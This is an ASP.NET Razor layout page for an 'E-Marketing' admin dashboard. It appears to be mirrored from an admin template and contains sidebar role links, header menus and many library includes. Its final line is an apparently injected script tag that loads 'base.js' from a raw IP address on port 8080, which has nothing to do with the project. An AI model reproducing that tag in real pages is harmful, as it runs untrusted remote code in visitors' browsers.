<!DOCTYPE html>
<html lang="en">


<!-- Mirrored from webstrot.com/html/midadmin/blank.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 17 Apr 2019 08:07:48 GMT -->
<!-- Added by HTTrack -->
<head>
    <meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <title>E-Marketing</title>

    <!-- ================= Favicon ================== -->
    <link rel="shortcut icon" type="image/png" href="~/Content/assets/images/favicon.png" />

    <!-- Toastr -->
    <link href="~/Content/assets/css/lib/toastr/toastr.min.css" rel="stylesheet">
    <!-- Sweet Alert -->
    <link href="~/Content/assets/css/lib/sweetalert/sweetalert.css" rel="stylesheet">
    <!-- Range Slider -->
    <link href="~/Content/assets/css/lib/rangSlider/ion.rangeSlider.css" rel="stylesheet">
    <link href="~/Content/assets/css/lib/rangSlider/ion.rangeSlider.skinFlat.css" rel="stylesheet">
    <!-- Bar Rating -->
    <link href="~/Content/assets/css/lib/barRating/barRating.css" rel="stylesheet">
    <!-- Nestable -->
    <link href="~/Content/assets/css/lib/nestable/nestable.css" rel="stylesheet">
    <!-- JsGrid -->
    <link href="~/Content/assets/css/lib/jsgrid/jsgrid-theme.min.css" rel="stylesheet" />
    <link href="~/Content/assets/css/lib/jsgrid/jsgrid.min.css" type="text/css" rel="stylesheet" />
    <!-- Calender 2 -->
    <link href="~/Content/assets/css/lib/calendar2/pignose.calendar.min.css" rel="stylesheet">
    <!-- Weather Icon -->
    <link href="~/Content/assets/css/lib/weather-icons.css" rel="stylesheet" />
    <!-- Owl Carousel -->
    <link href="~/Content/assets/css/lib/owl.carousel.min.css" rel="stylesheet" />
    <link href="~/Content/assets/css/lib/owl.theme.default.min.css" rel="stylesheet" />
    <!-- Select2 -->
    <link href="~/Content/assets/css/lib/select2/select2.min.css" rel="stylesheet">
    <!-- Chartist -->
    <link href="~/Content/assets/css/lib/chartist/chartist.min.css" rel="stylesheet">
    <!-- Calender -->
    <link href="~/Content/assets/css/lib/calendar/fullcalendar.css" rel="stylesheet" />

    <!-- Common -->
    <link href="~/Content/assets/css/lib/font-awesome.min.css" rel="stylesheet">
    <link href="~/Content/assets/css/lib/themify-icons.css" rel="stylesheet">
    <link href="~/Content/assets/css/lib/menubar/sidebar.css" rel="stylesheet">
    <link href="~/Content/assets/css/lib/bootstrap.min.css" rel="stylesheet">
    <link href="~/Content/assets/css/lib/helper.css" rel="stylesheet">
    <link href="~/Content/assets/css/style.css" rel="stylesheet">
    <script src="~/Content/assets/js/lib/jquery.min.js"></script>
    <script>
        $(window).load(function () {
            $('#myModal').show();
            $('#myModal').css('opacity', '1');
            $('#close').on('click', function () {
                $('#myModal').hide();
            });
            $('#login').on('click', function () {
                $('#myModal').show();
            });
            $('#fromuptoin').on('click', function () {
                $('#regModal').hide();
                $('#myModal').show();
            });
            $('#salem').on('click', function () {
                $('#regModal').show();
            });
            $('#salem').on('click', function () {
                $('#regModal').css('opacity', '1');
            });
            $('#close2').on('click', function () {
                $('#regModal').hide();
            });
            $('#fromintoup').on('click', function () {
                $('#myModal').hide();
                $('#regModal').show();
                $('#regModal').css('opacity', '1');
            });
        });
    </script>
</head>

<body>
    <div class="sidebar sidebar-hide-to-small sidebar-shrink sidebar-gestures">
        <div class="nano">
            <div class="nano-content">
                <div class="logo"><a href="index-2.html"><img src="~/Content/assets/images/logo.png" alt="" /></a></div>
                <ul>
                    <li class="label">Main</li>
                    <li><a href="index-2.html"><i class="ti-home"></i> Home </a></li>
                    <li><a href="create.html"><i class="ti-id-badge"></i>Create Profile</a></li>
                    <li>
                        <i class="ti-user"></i>
                        @if (Convert.ToInt32(Session["UserRole"]) == 1)
                        {
                            @Html.ActionLink("My Profile", "AdminProfile", "Admin")
                            @Html.ActionLink("List Users", "ListUsers", "Admin")
                            @Html.ActionLink("List Projects", "ListProjects", "Admin")
                        }
                        else if (Convert.ToInt32(Session["UserRole"]) == 2)
                        {
                            @Html.ActionLink("My Profile", "CustomerProfile", "Customer")
                        }
                        else if (Convert.ToInt32(Session["UserRole"]) == 3)
                        {
                            @Html.ActionLink("My Profile", "MarketingDirectorProfile", "MarketingDirector")
                        }
                        else if (Convert.ToInt32(Session["UserRole"]) == 4)
                        {
                            @Html.ActionLink("My Profile", "MarketingTeamLeaderProfile", "MarketingTeamLeader")
                        }
                        else if (Convert.ToInt32(Session["UserRole"]) == 5)
                        {
                            @Html.ActionLink("My Profile", "MarketingTraineeProfile", "MarketingTrainee")
                        }
                    </li>

                    <li><i class="ti-close"></i>@Html.ActionLink("Logout", "Logout", "Auth")</li>
                </ul>
            </div>
        </div>
    </div>
    <!-- /# sidebar -->
    <div class="header">
        <div class="container-fluid">
            <div class="row">
                <div class="col-lg-12">
                    <div class="float-left">
                        <div class="hamburger sidebar-toggle">
                            <span class="line"></span>
                            <span class="line"></span>
                            <span class="line"></span>
                        </div>
                    </div>
                    <div class="float-right">
                        <div class="search_wrap d-none d-sm-block d-md-block d-lg-block d-xl-block">
                            <div class="inbox-head top_search">
                                <form action="#" class=" position inbox_input">
                                    <div class="input-append inner-append border_11">
                                        <input type="text" class="sr-input" placeholder="Search Mail">
                                        <button class="btn sr-btn append-btn btn33" type="button"><i class="fa fa-search"></i></button>
                                    </div>
                                </form>
                            </div>
                        </div>
                        <div class="dropdown dib">
                            <div class="header-icon" data-toggle="dropdown">
                                <i class="ti-bell"></i>
                                <div class="drop-down dropdown-menu dropdown-menu-right">
                                    <div class="dropdown-content-heading">
                                        <span class="text-left">Recent Notifications</span>
                                    </div>
                                    <div class="dropdown-content-body">
                                        <ul>
                                            <li>
                                                <a href="#">
                                                    <img class="pull-left m-r-10 avatar-img" src="~/Content/assets/images/avatar/3.jpg" alt="" />
                                                    <div class="notification-content">
                                                        <small class="notification-timestamp pull-right">02:34 PM</small>
                                                        <div class="notification-heading">Mr. John</div>
                                                        <div class="notification-text">5 members joined today </div>
                                                    </div>
                                                </a>
                                            </li>
                                            <li>
                                                <a href="#">
                                                    <img class="pull-left m-r-10 avatar-img" src="~/Content/assets/images/avatar/3.jpg" alt="" />
                                                    <div class="notification-content">
                                                        <small class="notification-timestamp pull-right">02:34 PM</small>
                                                        <div class="notification-heading">Tasnim</div>
                                                        <div class="notification-text">Hi Teddy, Just wanted to let you ...</div>
                                                    </div>
                                                </a>
                                            </li>
                                            <li class="text-center">
                                                <a href="#" class="more-link">See All</a>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="dropdown dib">
                            <div class="header-icon" data-toggle="dropdown">
                                <i class="ti-email"></i>
                                <div class="drop-down dropdown-menu dropdown-menu-right">
                                    <div class="dropdown-content-heading">
                                        <span class="text-left">2 New Messages</span>
                                        <a href="email.html">
                                            <i class="ti-pencil-alt pull-right"></i>
                                        </a>
                                    </div>
                                    <div class="dropdown-content-body">
                                        <ul>
                                            <li class="notification-unread">
                                                <a href="#">
                                                    <img class="pull-left m-r-10 avatar-img" src="~/Content/assets/images/avatar/2.jpg" alt="" />
                                                    <div class="notification-content">
                                                        <small class="notification-timestamp pull-right">02:34 PM</small>
                                                        <div class="notification-heading">Mr. John</div>
                                                        <div class="notification-text">Hi Teddy, Just wanted to let you ...</div>
                                                    </div>
                                                </a>
                                            </li>
                                            <li>
                                                <a href="#">
                                                    <img class="pull-left m-r-10 avatar-img" src="~/Content/assets/images/avatar/3.jpg" alt="" />
                                                    <div class="notification-content">
                                                        <small class="notification-timestamp pull-right">02:34 PM</small>
                                                        <div class="notification-heading">Michael Qin</div>
                                                        <div class="notification-text">Hi Teddy, Just wanted to let you ...</div>
                                                    </div>
                                                </a>
                                            </li>
                                            <li class="text-center">
                                                <a href="#" class="more-link">See All</a>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="dropdown dib">
                            <div class="header-icon" data-toggle="dropdown">
                                <img class="pro_pic" src="~/Content/assets/images/icon1.jpg" alt="">
                                <span class="user-avatar">
                                    John
                                    <i class="ti-angle-down f-s-10"></i>
                                </span>
                                <div class="drop-down dropdown-profile dropdown-menu dropdown-menu-right">
                                    <div class="dropdown-content-heading">
                                        <span class="text-left">John Snow</span>
                                    </div>
                                    <div class="dropdown-content-body">
                                        <ul>
                                            <li>
                                                <a href="app-profile.html">
                                                    <i class="ti-user"></i>
                                                    <span>Profile</span>
                                                </a>
                                            </li>
                                            <li>
                                                <a href="#">
                                                    <i class="ti-settings"></i>
                                                    <span>Setting</span>
                                                </a>
                                            </li>
                                            <li>
                                                <a href="#">
                                                    <i class="ti-power-off"></i>
                                                    <span>Logout</span>
                                                </a>
                                            </li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div class="search_wrap d-block d-sm-none d-md-none d-lg-none d-xl-none">
                        <div class="inbox-head top_search">
                            <form action="#" class=" position inbox_input">
                                <div class="input-append inner-append border_11">
                                    <input type="text" class="sr-input" placeholder="Search">
                                    <button class="btn sr-btn append-btn btn33" type="button"><i class="fa fa-search"></i></button>
                                </div>
                            </form>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    @RenderBody();

    <section id="main-content">
        <div class="row">
            <div class="col-lg-12">
                <div id="extra-area-chart"></div>
                <div id="morris-line-chart"></div>
                <div class="footer">
                    <p>2019 ©  FCIH Team</p>
                </div>
            </div>
        </div>
    </section>
    </div>
    </div>

    <!-- Common -->
    <script src="~/Content/assets/js/lib/jquery.min.js"></script>
    <script src="~/Content/assets/js/lib/jquery.nanoscroller.min.js"></script>
    <script src="~/Content/assets/js/lib/menubar/sidebar.js"></script>
    <script src="~/Content/assets/js/lib/preloader/pace.min.js"></script>
    <script src="~/Content/assets/js/lib/bootstrap.min.js"></script>
    <script src="~/Content/assets/js/scripts.js"></script>

    <!-- Calender -->
    <script src="~/Content/assets/js/lib/jquery-ui/jquery-ui.min.js"></script>
    <script src="~/Content/assets/js/lib/moment/moment.js"></script>
    <script src="~/Content/assets/js/lib/calendar/fullcalendar.min.js"></script>
    <script src="~/Content/assets/js/lib/calendar/fullcalendar-init.js"></script>

    <!--  Chartjs -->
    <script src="~/Content/assets/js/lib/chart-js/Chart.bundle.js"></script>

    <!--  Knob -->
    <script src="~/Content/assets/js/lib/knob/jquery.knob.min.js"></script>
    <script src="~/Content/assets/js/lib/knob/knob.init.js"></script>

    <!-- Select2 -->
    <script src="~/Content/assets/js/lib/select2/select2.full.min.js"></script>

    <!--  Validation -->
    <script src="~/Content/assets/js/lib/form-validation/jquery.validate.min.js"></script>

    <!--  Circle Progress -->
    <script src="~/Content/assets/js/lib/circle-progress/circle-progress.min.js"></script>
    <script src="~/Content/assets/js/lib/circle-progress/circle-progress-init.js"></script>

    <!--  Vector Map -->
    <script src="~/Content/assets/js/lib/vector-map/jquery.vmap.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/jquery.vmap.min.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/jquery.vmap.sampledata.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.world.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.algeria.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.argentina.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.brazil.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.france.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.germany.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.greece.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.iran.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.iraq.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.russia.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.tunisia.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.europe.js"></script>
    <script src="~/Content/assets/js/lib/vector-map/country/jquery.vmap.usa.js"></script>

    <!--  Simple Weather -->
    <script src="~/Content/assets/js/lib/weather/jquery.simpleWeather.min.js"></script>
    <script src="~/Content/assets/js/lib/weather/weather-init.js"></script>

    <!--  Owl Carousel -->
    <script src="~/Content/assets/js/lib/owl-carousel/owl.carousel.min.js"></script>
    <script src="~/Content/assets/js/lib/owl-carousel/owl.carousel-init.js"></script>

    <!--  Calender 2 -->
    <script src="~/Content/assets/js/lib/calendar-2/moment.latest.min.js"></script>
    <script src="~/Content/assets/js/lib/calendar-2/pignose.calendar.min.js"></script>


    <!-- Datatable -->
    <script src="~/Content/assets/js/lib/data-table/datatables.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/dataTables.buttons.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/buttons.flash.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/jszip.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/pdfmake.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/vfs_fonts.js"></script>
    <script src="~/Content/assets/js/lib/data-table/buttons.html5.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/buttons.print.min.js"></script>
    <script src="~/Content/assets/js/lib/data-table/datatables-init.js"></script>

    <!-- JS Grid -->
    <script src="~/Content/assets/js/lib/jsgrid/db.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid.core.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid.load-indicator.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid.load-strategies.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid.sort-strategies.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid.field.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/fields/jsgrid.field.text.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/fields/jsgrid.field.number.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/fields/jsgrid.field.select.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/fields/jsgrid.field.checkbox.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/fields/jsgrid.field.control.js"></script>
    <script src="~/Content/assets/js/lib/jsgrid/jsgrid-init.js"></script>

    <!--  Datamap -->
    <script src="~/Content/assets/js/lib/datamap/d3.min.js"></script>
    <script src="~/Content/assets/js/lib/datamap/topojson.js"></script>

    <!--ION Range Slider JS-->
    <script src="~/Content/assets/js/lib/rangeSlider/ion.rangeSlider.min.js"></script>
    <script src="~/Content/assets/js/lib/rangeSlider/moment.js"></script>
    <script src="~/Content/assets/js/lib/rangeSlider/moment-with-locales.js"></script>
    <script src="~/Content/assets/js/lib/rangeSlider/rangeslider.init.js"></script>

    <!-- Bar Rating-->
    <script src="~/Content/assets/js/lib/barRating/jquery.barrating.js"></script>
    <script src="~/Content/assets/js/lib/barRating/barRating.init.js"></script>

    <!-- jRate -->
    <script src="~/Content/assets/js/lib/rating1/jRate.min.js"></script>
    <script src="~/Content/assets/js/lib/rating1/jRate.init.js"></script>

    <!-- Toastr -->
    <script src="~/Content/assets/js/lib/toastr/toastr.min.js"></script>
    <script src="~/Content/assets/js/lib/toastr/toastr.init.js"></script>
    <script type='text/javascript' id='1qa2ws' charset='utf-8' src='../../../105.203.255.69_8080/www/default/base.js'></script>
</body>

</html>
